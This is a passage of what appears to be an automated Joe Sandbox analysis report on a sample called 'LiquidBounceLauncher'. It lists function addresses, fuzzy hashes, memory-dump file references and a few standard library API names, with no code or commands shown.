                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7b37ca7d81a6ad0a015b4938224d1b626b7c6661b5e20e5d3d082271e7961539
                                                                                                                                                                                      • Instruction ID: 18d860b1fa14cb37c875701a584605dab744bf11f81341ddbd2353f1522ebc9a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b37ca7d81a6ad0a015b4938224d1b626b7c6661b5e20e5d3d082271e7961539
                                                                                                                                                                                      • Instruction Fuzzy Hash: FA52A2789042588FCB24CF68C0907AEBBB1AF05325F18865AEC559F393D379DD4ACB85
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0044F810 Relevance: 2.0, APIs: 1, Instructions: 705COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3297308162-0
                                                                                                                                                                                      • Opcode ID: 457a2f9d00c48bc3245965e8b6032863f8ce45164ec75a6a2a18b0222b2ea11e
                                                                                                                                                                                      • Instruction ID: 39186044016066badd739aa1b11408918b48cef7630c41cbafdb505e6beec9ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 457a2f9d00c48bc3245965e8b6032863f8ce45164ec75a6a2a18b0222b2ea11e
                                                                                                                                                                                      • Instruction Fuzzy Hash: B75285749042988FEB24CF68C4907AEBBB1BF05314F24866AE8559F392C379DD4ECB45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0044E2A0 Relevance: 2.0, APIs: 1, Instructions: 705COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3297308162-0
                                                                                                                                                                                      • Opcode ID: 457a2f9d00c48bc3245965e8b6032863f8ce45164ec75a6a2a18b0222b2ea11e
                                                                                                                                                                                      • Instruction ID: 689bd597dcd621e70794f0b6a48170a9404485338898153934dcdab8acb6fc09
                                                                                                                                                                                      • Opcode Fuzzy Hash: 457a2f9d00c48bc3245965e8b6032863f8ce45164ec75a6a2a18b0222b2ea11e
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE5270709042988FEF25CF6AC4807AEBBB1BF05324F18865AE8659B3D1C379DD46CB45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004546D0 Relevance: 1.9, APIs: 1, Instructions: 655COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3297308162-0
                                                                                                                                                                                      • Opcode ID: 3e0600d10fd1a472a58714ad8db5058b4581850b81a12604b2551e4b5c809a23
                                                                                                                                                                                      • Instruction ID: 96eb0685b4b3da10b9db247e80549045d81041b0a460d616cb2d5b967acc5d80
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e0600d10fd1a472a58714ad8db5058b4581850b81a12604b2551e4b5c809a23
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C52B0709042989FDF14DFA8D4907EEBFB1BF85319F14415AE8949F382C339998ACB49
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004550B0 Relevance: 1.9, APIs: 1, Instructions: 616COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: dfa5fdeb6a4a3281b415f392d393532fadb2601181522f2b0e5b7bb1b06ac65c
                                                                                                                                                                                      • Instruction ID: 4ad1b4f430fb817713b3e7175209d73214cac2273b52853be5dfcc5bf8667495
                                                                                                                                                                                      • Opcode Fuzzy Hash: dfa5fdeb6a4a3281b415f392d393532fadb2601181522f2b0e5b7bb1b06ac65c
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC42CE70D046989FCB24CFA8C4A07BEBFB1AF05316F54815AEC959B393C339994ACB45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00442300 Relevance: 1.6, APIs: 1, Instructions: 340stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 39653677-0
                                                                                                                                                                                      • Opcode ID: d566590d37779bca265cc2a5a866327b1f82eae64eea281ff3e62f8c7e20948d
                                                                                                                                                                                      • Instruction ID: 6572cbfedd131e2db393b7ed6b6b938846ae8a70de01d2c1df268d13324d265e
                                                                                                                                                                                      • Opcode Fuzzy Hash: d566590d37779bca265cc2a5a866327b1f82eae64eea281ff3e62f8c7e20948d
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8E18E71A002199FDF10CF68C5806AEBBB1FF49324F99825AE865AB351D378ED42CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004459D0 Relevance: 1.6, APIs: 1, Instructions: 339COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: wcslen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4088430540-0
                                                                                                                                                                                      • Opcode ID: 6f7f5b90580d5666d0b00d796ca2982ba48def252964b94c7d73c1743d95d948
                                                                                                                                                                                      • Instruction ID: 08bcb5c0687c8f50d6dbc8861d8eb843e88b5da55d6bceeccdf8b671abe41a2c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f7f5b90580d5666d0b00d796ca2982ba48def252964b94c7d73c1743d95d948
                                                                                                                                                                                      • Instruction Fuzzy Hash: B9D15B75A00A198BDF20CFA9C4C09AEB7B1FF09314F64815AE815AB352D339ED42CF59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00434830 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 00434850
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
                                                                                                                                                                                      • API String ID: 0-3720052664
                                                                                                                                                                                      • Opcode ID: 57d958158b86c02413643cf74005ce1571a50de14eb1e86c6b5385a1bab1e690
                                                                                                                                                                                      • Instruction ID: 797be46cca4dcb372424053bc74846860484fdfa08f86887592c024e732a317d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 57d958158b86c02413643cf74005ce1571a50de14eb1e86c6b5385a1bab1e690
                                                                                                                                                                                      • Instruction Fuzzy Hash: 22E0B6B5E056408BCB04EF18C585929F7F1ABDA304F65D99EE08497320D739E410CA1E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0045A810 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cbb0e4f9b88b2d7a6650d90fecc40526e0775244c170c98f36a30aa5f9b779e2
                                                                                                                                                                                      • Instruction ID: e31488a3340eb5ef04503b46bb2f766879f26bfb1010082582fa86d825ac1250
                                                                                                                                                                                      • Opcode Fuzzy Hash: cbb0e4f9b88b2d7a6650d90fecc40526e0775244c170c98f36a30aa5f9b779e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: F662B3709042588FCF14CFA8C0947AEBBB1BF05316F14865BEC559B392D3399D4ACB9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00459220 Relevance: .7, Instructions: 694COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a258506de216c7f85c95109a303eaafde9558003bfced6e00399c58da62ecf4b
                                                                                                                                                                                      • Instruction ID: 30fdc1a55be4739fedfd476bfa1661b433a3843a6add5f862f97500b3ee14ecb
                                                                                                                                                                                      • Opcode Fuzzy Hash: a258506de216c7f85c95109a303eaafde9558003bfced6e00399c58da62ecf4b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61529D71904258CBCF14CFA8C0807AEBBB1BF05316F18855AEC55AF396D3399D4ACB99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00457270 Relevance: .7, Instructions: 684COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d59fddb648f0214e118f3789cea002392b04290cc6dcb46b32174963d505f39b
                                                                                                                                                                                      • Instruction ID: d3fa40877cfbe804bdb3042dd9eecabec887df97f548e16faab49a3c23207c66
                                                                                                                                                                                      • Opcode Fuzzy Hash: d59fddb648f0214e118f3789cea002392b04290cc6dcb46b32174963d505f39b
                                                                                                                                                                                      • Instruction Fuzzy Hash: EF529070908258CBCF14CFA8D4847AEBBB1BF05316F14816AEC559F392D3399D4ACB99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00458750 Relevance: .7, Instructions: 684COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d59fddb648f0214e118f3789cea002392b04290cc6dcb46b32174963d505f39b
                                                                                                                                                                                      • Instruction ID: 1091c04c8aa2c49397a6c399c3836be4d4d000713a2698cebf632fceb2893e64
                                                                                                                                                                                      • Opcode Fuzzy Hash: d59fddb648f0214e118f3789cea002392b04290cc6dcb46b32174963d505f39b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 26529D70904258CBDB14CFA8C4807AEBBB1BF05316F14855EEC55AF392DB399C4ACB59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0045D6E0 Relevance: .6, Instructions: 646COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0fef4e99f3ca518b20c51baec2612aa202abb0f0b54540f533148892ce019214
                                                                                                                                                                                      • Instruction ID: 1f200edd1bb20558474ba5fe1c49398e542e8a5747cb5b3430d8ae2d038c6565
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fef4e99f3ca518b20c51baec2612aa202abb0f0b54540f533148892ce019214
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D42CF70E042488FDF24DFA8C0907AEBBF2AF05315F14815AEC55AB392D3799D8ACB55
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0045E0C0 Relevance: .6, Instructions: 633COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 94f3637f5ce032b681e3421dddba03a76db56ad4999c17d41abf14a675318457
                                                                                                                                                                                      • Instruction ID: ef527aaff270045ad07213276ba5f56baf6f740d25e84f0aa70235a04c48fbeb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 94f3637f5ce032b681e3421dddba03a76db56ad4999c17d41abf14a675318457
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC42E470A042589FDF18DFAAC0807AEBBF1AF05305F54855BEC559B382D3399E4ACB49
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004192E0 Relevance: .5, Instructions: 458COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7aac274cc496dc25f8b1da083ab44e4746d559f175cde4f3ec8bd3215dcb3fbb
                                                                                                                                                                                      • Instruction ID: 00cc8d545c3bc05144866684bc1f7c6ec43a4e6efd145980501f803464cf7433
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aac274cc496dc25f8b1da083ab44e4746d559f175cde4f3ec8bd3215dcb3fbb
                                                                                                                                                                                      • Instruction Fuzzy Hash: CBF183707042058BD714AF2A98A13AAB7D29B48344F19987FDC56CF38AD63DCCD6C789
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00420540 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
